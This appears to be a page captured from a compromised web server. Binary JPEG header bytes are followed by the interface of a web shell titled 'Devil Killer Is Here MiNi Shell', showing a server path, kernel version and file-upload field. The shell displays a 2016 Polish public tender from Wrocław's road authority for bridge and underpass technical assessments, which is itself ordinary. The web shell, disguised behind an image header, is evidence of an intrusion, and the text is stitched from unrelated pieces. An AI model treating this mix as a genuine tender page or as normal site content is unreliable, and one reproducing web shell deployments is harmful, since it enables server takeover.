JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160524/131780-N-2016.html

<p class="kh_header"><b>Wrocław: Wykonanie ekspertyz i orzeczeń technicznych wybranych obiektów inżynierskich we Wrocławiu</b><br>
<b>Numer ogłoszenia: 131780 - 2016; data zamieszczenia: 24.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Utrzymania Miasta , ul. Długa 49, 53-633 Wrocław, woj. dolnośląskie, tel. 0-71 3559076, faks 0-71 3734906, 3550866.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> wzp.zdium.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie ekspertyz i orzeczeń technicznych wybranych obiektów inżynierskich we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie: 

1.1.	ekspertyz technicznych wybranych obiektów inżynierskich Wrocławia:
a)	Most Bolesława Chrobrego Południowy,
b)	Most Bolesława Chrobrego Północny,
c)	Most Zwierzyniecki,
d)	Wiadukt w ul. Kowalskiej,
e)	Most Pomorski Południowy,
f)	Most Pomorski Środkowy,
g)	Most Pomorski Północny
h)	Most Jagielloński Południowy nowy,
i)	Most Jagielloński Północny nowy,
j)	Most Trzebnicki Południowy,
k)	Most Trzebnicki Północny,
l)	Most Osobowicki Południowy,
m)	Most Osobowicki Północny,
n)	Kładka Grabiszyńska,
o)	Wiadukt drogowy w ciągu ul. Strzegomskiej nad PKP - konstrukcja stalowa,
p)	Wiadukt drogowy w ciągu ul. Strzegomskiej nad PKP - konstrukcja betonowa,
q)	Tunel samochodowy północny pod pl. Dominikańskim,
r)	Most Średzki Wschodni Stary,
s)	Most Średzki Zachodni Stary

1.2.	orzeczeń technicznych wybranych obiektów inżynierskich Wrocławia:
a)	Kładka Jana III Sobieskiego - przydatność do dalszej eksploatacji,
b)	Estakada Zachodnia pl. Społeczny - przydatność dalszej eksploatacji,
c)	Most Polanowicki w ciągu ul. Kamieńskiego - sprawdzenie spoin.

1.3.	Okresowej kontroli przejścia podziemnego Brama Oławska - lokal użytkowy.

2. Zakres zamówienia obejmuje:
2.1.	przy wykonywaniu ekspertyz:
a)	wykonanie oględzin obiektów i ich otoczenia dla potrzeb ekspertyzy,
b)	wykonanie inwentaryzacji obiektu - wszystkich podstawowych parametrów, jak długość dylatacji, ilość wpustów, łożysk, skrajni poziomej i pionowej,
c)	wykonanie rysunków przekrojów podłużnych i poprzecznych obiektu na podstawie przeprowadzonej inwentaryzacji obiektu,
d)	sprawdzenie i ocenę stanu technicznego elementów obiektu wraz z inwentaryzacją wszystkich uszkodzeń oraz naniesienie uszkodzeń i ich zasięgu na rysunkach, 
e)	wykonanie inwentaryzacji rys z pomiarem ich szerokości, naniesienie danych na rysunki,
f)	wykonanie pomiarów i podstawowych badań:
-	ocena zagrożenia chemicznego betonu (zawartości chlorków, siarczanów i azotanów 
   zestawione tabelarycznie z wartościami dopuszczalnymi),
-	pobieranie i badanie wytrzymałości próbek rdzeniowych betonu /w porozumieniu z Zamawiającym/,
-	badanie sklerometryczne,
-	badanie ubytków korozyjnych zbrojenia z oceną wpływu na nośność,
-	pomiar grubości elementów stalowych konstrukcji,
-	wykonanie niwelacji pomostu,
-	badanie powłok malarskich,
-	badanie ubytków korozyjnych, ich rodzajów, z określeniem ich wpływu na poszczególne parametry elementów stalowych konstrukcji,
g)	wykonanie protokołu z przeglądu okresowego obiektu z oceną jego elementów.

2.2.  przy wykonywaniu orzeczeń:
a)	wykonanie oględzin obiektów i ich otoczenia dla potrzeb orzeczenia,
b)	wykonanie inwentaryzacji obiektu - wszystkich podstawowych parametrów, jak długość dylatacji, ilość wpustów, łożysk, skrajni poziomej i pionowej,
c)	wykonanie rysunków przekrojów podłużnych i poprzecznych obiektu,
d)	sprawdzenie i ocenę stanu technicznego elementów obiektu wraz z inwentaryzacją wszystkich uszkodzeń oraz naniesienie uszkodzeń i ich zasięgu na rysunkach, 
e)	wykonanie pomiarów i podstawowych badań z zakresu pomiaru rys na elementach stalowych dźwigarów wraz z ich inwentaryzacją, kontroli spawanych połączeń i ich wad ukrytych - dla mostu Polanowickiego,
f)	wykonanie protokołu z przeglądu okresowego obiektu z oceną jego elementów.

2.3. przy wykonywaniu okresowej kontroli lokalu:
a)	 wykonanie wizualnej oceny stanu technicznego obiektu budowlanego
b)	wykonanie protokołów z przeglądów wraz z dokumentacją fotograficzną pomieszczeń, instalacji, opisem stwierdzonych uszkodzeń,  opisem przyczyny ich powstania
c)	wykonanie inwentaryzacji pomieszczeń wraz z rysunkami , naniesieniem pomiarów powierzchni
d)	wykonanie inwentaryzacji sieci wraz z naniesieniem ich lokalizacji na rysunkach
e)	określenie przydatności obiektu do użytkowania, warunków bezpiecznej eksploatacji,
f)	określenie potrzeb niezbędnych ograniczeń w eksploatacji na obiektach o złym stanie technicznym wraz z ich uzasadnieniem,
g)	oszacowanie wstępnych kosztów zalecanych prac na obiekcie w ramach  eksploatacji i oddzielnie dla wymaganego remontu
h)	 wykonanie instrukcji eksploatacji obiektu z wytypowaniem robót niezbędnych do wykonania w trakcie użytkowania lokalu,
i)	 wykonanie pomiarów kontrolnych urządzeń obcych i sieci,
j)	wykonanie oceny stanu technicznego stropu i ścian lokali wraz z inwentaryzacją uszkodzeń, podaniem przyczyn ich występowania, zaleceniami do zapobiegania ich propagacji

2.3.1. Wytyczne w zakresie wykonania ekspertyz:
2.3.1.1. Ekspertyzy obiektów inżynierskich powinny zawierać:
a)	ocenę stanu technicznego ustroju nośnego,
b)	ocenę stanu technicznego łożysk z pomiarami zakończonych protokołem kontroli zgodnie z załącznikiem do Zarządzenia nr 10 Generalnego Dyrektora Dróg Krajowych 
i Autostrad z dnia 8 lutego 2006 r. - zalecenia dotyczące łożyskowania obiektów mostowych oraz kontroli łożysk podczas eksploatacji,
c)	ocenę stanu technicznego dylatacji,
d)	ocenę ubytków betonu i ich wpływu na nośność,
e)	ocenę postępu korozji elementów stalowych konstrukcji i wyposażenia wraz z oceną wpływu korozji na nośność,
f)	ocenę rys pod względem ich wpływu na nośność obiektu, propozycję sposobu zabezpieczenia przed ich propagacją,
g)	ocenę korozji prętów zbrojenia i ich wpływ na nośność,
h)	ocenę aktualnej nośności obiektów (analiza statyczna wraz z schematami statycznymi), z uwzględnieniem istniejących ubytków materiałowych w konstrukcji czy jej stwierdzonych uszkodzeń,
i)	orzeczenie o stanie technicznym i ustalenie strategii dalszego postępowania,
j)	wyznaczenie klasy obciążeń dla aktualnego stanu obiektu i porównanie do normowej klasy obciążeń, 
k)	ocenę potrzeb niezbędnych ograniczeń na obiekcie,
l)	zakres robót budowlanych i konserwacyjnych z podziałem na zalecenia eksploatacyjne i remontowe,
m)	wnioski końcowe na podstawie analiz i przeprowadzonych badań,
n)	terminy zalecanych prac remontowych wraz ze szczegółowym zakresem.

2.3.1.2.	Szczegółowa zawartość opracowania:
a)	strona tytułowa zawierająca informacje takie jak:
		- nazwa firmy wykonawczej, 
		- zarządca obiektu, 
		- tytuł opracowania,
		- nazwa obiektu,
		- lokalizacja obiektu,
		- kategoria drogi,
		- numer obiektu,
		- JNI,
		- osoba opracowująca, nr uprawnień,
		- data wykonania opracowania,
b)	oświadczenie wykonawcy,
c)	spis zawartości opracowania,
d)	dokumentacja fotograficzna obiektu, dokumentacja fotograficzna uszkodzeń - wg wymagań opisanych w pkt 2.1. Części III Instrukcji dla wykonawców, dokumentacja fotograficzna z badań,
e)	opis badań z załączonymi wynikami i porównaniem otrzymanych wartości do wymaganych według norm,
f)	niwelacja obiektu wraz z opisem odchyłek i ich przyczyn,
g)	wnioski, analiza wyników,
h)	zalecenia pod kątem dalszej eksploatacji, rozbicie robót na roboty niezbędne do wykonania w zakresie eksploatacji i w ramach remontu, termin ważności opracowania,
i)	spis i zestaw wszystkich rysunków,
j)	kopia uprawnień mostowych bez ograniczeń (przeprowadzającego ekspertyzę).

2.3.2. Wytyczne w zakresie wykonania orzeczeń:
2.3.2.1.	Orzeczenia techniczne obiektów inżynierskich powinny zawierać:
a)	ocenę stanu technicznego ustroju nośnego,
b)	ocenę rys pod względem ich wpływu na nośność obiektu, propozycję sposobu zabezpieczenia przed ich propagacją, wyznaczenie aktualnej klasy obciążeń,
c)	ocenę aktualnej nośności obiektów (analiza statyczna wraz ze schematami statycznymi) po uwzględnieniu uszkodzeń i porównanie do nośności normowej,
d)	ustalenie strategii dalszego postępowania,
e)	ocenę potrzeb niezbędnych ograniczeń na obiekcie,
f)	badania dźwigarów stalowych metodą magnetyczno-proszkową ze wskazaniem zakresu niezbędnych napraw, w oparciu o obliczenia wpływu wykrytych wad na nośność obiektu,
g)	zakres robót niezbędnych w celu zabezpieczenia obiektu przed dalszą propagacją rys na dźwigarach stalowych bądź awarią, jeżeli jest takie zagrożenie,
h)	wnioski końcowe na podstawie analiz i przeprowadzonych badań,
i)	terminy zalecanych prac wraz ze szczegółowym zakresem robót eksploatacyjnych i remontowych,
j)	badania dźwigarów stalowych metodą magnetyczno-proszkową ze wskazaniem zakresu niezbędnych napraw, w oparciu o obliczenia wpływu wykrytych wad na nośność obiektu - most Polanowicki,

2.3.2.2.	Szczegółowa zawartość opracowania:
	a)	strona tytułowa zawierająca informacje takie jak:
		- nazwa firmy wykonawczej, 
		- zarządca obiektu, 
		- tytuł opracowania,
		- nazwa obiektu,
		- lokalizacja obiektu,
		- kategoria drogi,
		- numer obiektu,
		- JNI,
		- osoba opracowująca, nr uprawnień,
		- data wykonania opracowania,
	b)	oświadczenie wykonawcy,
	c)	spis zawartości opracowania,
	d)	dokumentacja fotograficzna obiektu, dokumentacja fotograficzna uszkodzeń - wg wymagań opisanych w pkt 2.2. Części III Instrukcji dla wykonawców, dokumentacja fotograficzna z badań,
	e)	opis badań z załączonymi wynikami i porównaniem otrzymanych wartości do wymaganych według norm,
	f)	niwelacja obiektu wraz z opisem odchyłek i ich przyczyn,
	g)	wnioski, analiza wyników,
	h)	zalecenia pod kątem dalszej eksploatacji, rozbicie robót na roboty niezbędne do wykonania w zakresie eksploatacji i w ramach remontu, termin ważności opracowania,
	i)	spis i zestaw wszystkich rysunków.
       j)  kopia uprawnień mostowych bez ograniczeń (osoby wykonującej orzeczenie).


2.3.3.	Wytyczne w zakresie wykonania kontroli lokalu w przejściu podziemnym Brama Oławska:
2.3.3.1.	Kontrola okresowa powinna zawierać:
a)	ocenę stanu technicznego,
b)	ustalenie strategii dalszego postępowania,
c)	zakres robót niezbędnych w celu zabezpieczenia obiektu przed dalszą degradacją,
d)	wnioski końcowe na podstawie analiz i przeprowadzonych badań,
e)	 terminy zalecanych prac wraz ze szczegółowym zakresem robót eksploatacyjnych i remontowych.

2.3.3.2.	Szczegółowa zawartość opracowania:
	a)	strona tytułowa zawierająca informacje takie jak:
		- nazwa firmy wykonawczej, 
		- zarządca obiektu, 
		- tytuł opracowania,
		- nazwa obiektu,
		- lokalizacja obiektu,
		- kategoria drogi,
		- numer obiektu,
		- JNI,
		- imię i nazwisko osoby opracowującej wskazanej w umowie z Zamawiającym oraz  nr uprawnień,
		- data wykonania opracowania,
b)	oświadczenie wykonawcy o kompletności opracowań wykonanych zgodnie z posiadaną wiedzą techniczną i wymaganiami obowiązujących przepisów,
	c)	spis zawartości opracowania,
	d)	dokumentacja fotograficzna obiektu, dokumentacja fotograficzna uszkodzeń -, dokumentacja fotograficzna z badań,
	e)	opis badań z załączonymi wynikami i porównaniem otrzymanych wartości do wymaganych według norm w zakresie urządzeń obcych - instalacji na potrzeby funkcjonowania lokalu,
	f)		wnioski, analiza wyników,
	h)	zalecenia pod kątem dalszej eksploatacji, rozbicie robót na roboty niezbędne do wykonania w zakresie eksploatacji i w ramach remontu, termin ważności opracowania,
	i)	spis i zestaw wszystkich rysunków:
		- inwentaryzacja lokalu w przejściu podziemnym Brama Oławska
	- inwentaryzacja wszystkich sieci zlokalizowanych w lokalu wraz z przyłączami: wodociągowym, kanalizacyjnym, energetycznym, wentylacyjnym..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający zamierza udzielić zamówień uzupełniających polegających na powtórzeniu czynności wymienionych w pkt II.1.4)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.63.14.50-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2500</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.	Posiadają niezbędną wiedzę i doświadczenie, tj.: wykonali lub wykonują w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zamówienie lub zamówienia polegające na przeprowadzeniu co najmniej 5 ekspertyz obiektów inżynierskich o długości całkowitej obiektu większej niż 60 m i o zróżnicowanym schemacie statycznym innym niż belka swobodnie podparta (np. belki ciągłe, kratownice, konstrukcje podwieszone itp.) z których każda obejmowała łącznie: 
a)	sprawdzenie i ocenę stanu technicznego elementów obiektów wraz z inwentaryzacjami całych obiektów, wykonanie rysunków przekrojowych z naniesionymi wartościami pomiarów,
b)	wykonanie niezbędnych pomiarów i badań (betonu, korozji na konstrukcjach stalowych, stanu  technicznego dylatacji, ocenę rys) mających wpływ na nośność obiektów,
c)	wyznaczenie aktualnej nośności obiektów (analiza statyczna wraz ze schematami statycznymi),
d)	orzeczenie o stanie technicznym obiektów wraz z wnioskami i zaleceniami, w tym co do zakresu robót budowlanych i konserwacyjnych.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 
W przypadku, gdy wykonawcy będą ubiegać się wspólnie o udzielenie zamówienia, muszą spełnić: 
- warunek 1  - dowolny wykonawca lub wykonawcy łącznie
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na zasadzie       spełnia / nie spełnia.
Wykonawcą może być osoba fizyczna, osoba prawna, jednostka organizacyjna nieposiadająca osobowości prawnej albo podmioty te występujące wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.	Dysponują osobami zdolnymi do wykonania zamówienia, tj.: 
a)	osobą posiadającą uprawnienia bez ograniczeń do projektowania w specjalności mostowej, która przynależy do Okręgowej Izby Inżynierów Budownictwa,
b)	osobą z uprawnieniami w specjalności instalacyjno-inżynieryjnej  w zakresie sieci sanitarnych, która przynależy do Okręgowej Izby Inżynierów Budownictwa,
c)	osobą (elektrykiem) posiadającą świadectwo kwalifikacji uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji w zakresie obsługi i konserwacji.
Wykonawca może polegać na  osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 
W przypadku, gdy wykonawcy będą ubiegać się wspólnie o udzielenie zamówienia, muszą spełnić: 
- warunek  1  - dowolny wykonawca lub wykonawcy łącznie
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na zasadzie       spełnia / nie spełnia.
Wykonawcą może być osoba fizyczna, osoba prawna, jednostka organizacyjna nieposiadająca osobowości prawnej albo podmioty te występujące wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W wykazie, o którym mowa powyżej należy wskazać zamówienie lub zamówienia polegające na przeprowadzeniu co najmniej 5 ekspertyz obiektów inżynierskich o długości całkowitej obiektu większej niż 60 m i o zróżnicowanym schemacie statycznym innym niż belka swobodnie podparta (np. belki ciągłe, kratownice, konstrukcje podwieszone itp.) z których każda obejmowała łącznie: 
e)	sprawdzenie i ocenę stanu technicznego elementów obiektów wraz z inwentaryzacjami całych obiektów, wykonanie rysunków przekrojowych z naniesionymi wartościami pomiarów,
f)	wykonanie niezbędnych pomiarów i badań (betonu, korozji na konstrukcjach stalowych, stanu  technicznego dylatacji, ocenę rys) mających wpływ na nośność obiektów,
g)	wyznaczenie aktualnej nośności obiektów (analiza statyczna wraz ze schematami statycznymi),
h)	orzeczenie o stanie technicznym obiektów wraz z wnioskami i zaleceniami, w tym co do zakresu robót budowlanych i konserwacyjnych.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W sytuacji, gdy Wykonawca polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest udowodnić, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia w stopniu niezbędnym dla należytego wykonania zamówienia oraz, że stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz dokumenty dotyczące: a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
